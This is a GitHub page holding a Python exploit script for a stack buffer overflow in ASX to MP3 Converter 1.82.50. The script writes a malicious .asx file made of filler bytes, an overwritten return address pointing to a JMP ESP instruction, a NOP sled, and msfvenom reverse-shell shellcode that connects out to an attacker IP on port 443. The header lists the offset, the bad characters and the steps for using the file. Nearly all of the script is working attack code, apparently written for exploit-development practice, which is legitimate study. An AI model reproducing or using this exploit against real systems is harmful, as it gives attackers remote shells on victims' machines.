-
Notifications
You must be signed in to change notification settings - Fork 0
/
ASXtoMP3ConverterSOFexploit.py
82 lines (71 loc) · 3.38 KB
/
ASXtoMP3ConverterSOFexploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#!/usr/bin/python
# ASX to MP3 Converter 1.82.50 SOF exploit
# Software: https://www.exploit-db.com/apps/b7c8c2a232e1d4a959c43970a877a799-ASXtoMP3Converter.exe
# Date: 02 Oct 2022
# Reference:
# Author: Dylan Jenkins
# Based on PoC by the totally real person: Ivan Ivanovic Ivanov
# Reference: https://www.exploit-db.com/exploits/38382/
# Tested on: Windows 2k3
# EIP Offset: 249
# Bad Chars: x00\x09\x0a\x1a
# Return Address | dll: 0x1003789d ("\xFF\xEF", JMP ESP) | MSA2Multility03.dll
# Usage: Open ASX to MP3 Converter application > load evil asx file
import socket
import time
import sys
filler = "A" * 249
eip = "\x9d\x78\x03\x10"
nops = "\x90" * 10
# Code used to generate payload:
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.176 LPORT=443 -f python -b "\x00\x09\x0a\x1a" -v shellcode
shellcode = b""
shellcode += b"\xbe\xb3\x11\x41\xb4\xd9\xc0\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x31\x72\x12\x03\x72\x12"
shellcode += b"\x83\x59\xed\xa3\x41\x61\xe6\xa6\xaa\x99\xf7"
shellcode += b"\xc6\x23\x7c\xc6\xc6\x50\xf5\x79\xf7\x13\x5b"
shellcode += b"\x76\x7c\x71\x4f\x0d\xf0\x5e\x60\xa6\xbf\xb8"
shellcode += b"\x4f\x37\x93\xf9\xce\xbb\xee\x2d\x30\x85\x20"
shellcode += b"\x20\x31\xc2\x5d\xc9\x63\x9b\x2a\x7c\x93\xa8"
shellcode += b"\x67\xbd\x18\xe2\x66\xc5\xfd\xb3\x89\xe4\x50"
shellcode += b"\xcf\xd3\x26\x53\x1c\x68\x6f\x4b\x41\x55\x39"
shellcode += b"\xe0\xb1\x21\xb8\x20\x88\xca\x17\x0d\x24\x39"
shellcode += b"\x69\x4a\x83\xa2\x1c\xa2\xf7\x5f\x27\x71\x85"
shellcode += b"\xbb\xa2\x61\x2d\x4f\x14\x4d\xcf\x9c\xc3\x06"
shellcode += b"\xc3\x69\x87\x40\xc0\x6c\x44\xfb\xfc\xe5\x6b"
shellcode += b"\x2b\x75\xbd\x4f\xef\xdd\x65\xf1\xb6\xbb\xc8"
shellcode += b"\x0e\xa8\x63\xb4\xaa\xa3\x8e\xa1\xc6\xee\xc6"
shellcode += b"\x06\xeb\x10\x17\x01\x7c\x63\x25\x8e\xd6\xeb"
shellcode += b"\x05\x47\xf1\xec\x6a\x72\x45\x62\x95\x7d\xb6"
shellcode += b"\xab\x52\x29\xe6\xc3\x73\x52\x6d\x13\x7b\x87"
shellcode += b"\x22\x43\xd3\x78\x83\x33\x93\x28\x6b\x59\x1c"
shellcode += b"\x16\x8b\x62\xf6\x3f\x26\x99\x91\xff\x1f\xd6"
shellcode += b"\xd1\x68\x62\x18\x13\xd2\xeb\xfe\x79\x34\xba"
shellcode += b"\xa9\x15\xad\xe7\x21\x87\x32\x32\x4c\x87\xb9"
shellcode += b"\xb1\xb1\x46\x4a\xbf\xa1\x3f\xba\x8a\x9b\x96"
shellcode += b"\xc5\x20\xb3\x75\x57\xaf\x43\xf3\x44\x78\x14"
shellcode += b"\x54\xba\x71\xf0\x48\xe5\x2b\xe6\x90\x73\x13"
shellcode += b"\xa2\x4e\x40\x9a\x2b\x02\xfc\xb8\x3b\xda\xfd"
shellcode += b"\x84\x6f\xb2\xab\x52\xd9\x74\x02\x15\xb3\x2e"
shellcode += b"\xf9\xff\x53\xb6\x31\xc0\x25\xb7\x1f\xb6\xc9"
shellcode += b"\x06\xf6\x8f\xf6\xa7\x9e\x07\x8f\xd5\x3e\xe7"
shellcode += b"\x5a\x5e\x4e\xa2\xc6\xf7\xc7\x6b\x93\x45\x8a"
shellcode += b"\x8b\x4e\x89\xb3\x0f\x7a\x72\x40\x0f\x0f\x77"
shellcode += b"\x0c\x97\xfc\x05\x1d\x72\x02\xb9\x1e\x57"
offset = "B" * (1000-len(filler)-4-len(nops)-len(shellcode))
# Buffer Sturcture:
# AAAAA.AAAA + EIP + NOP...NOP + shellcode + BBB....BBB
inputBuffer = filler + eip + nops + shellcode + offset
# Create buffer asx file and print to user
print("\n .asx file buffer file creator, run as sudo/admin for file creation rights \n")
print("\nCreating evil asx file buffer to test control of EIP\n")
print("\ninput buffer is:\n")
print(inputBuffer)
print("\nlength of buffer is:\n")
print(len(inputBuffer))
print("\ncreatingfile: evil.asx\n")
f = open("evil.asx", "w")
f.write(inputBuffer)
f.close()
print("\nclosing\n")
sys.exit()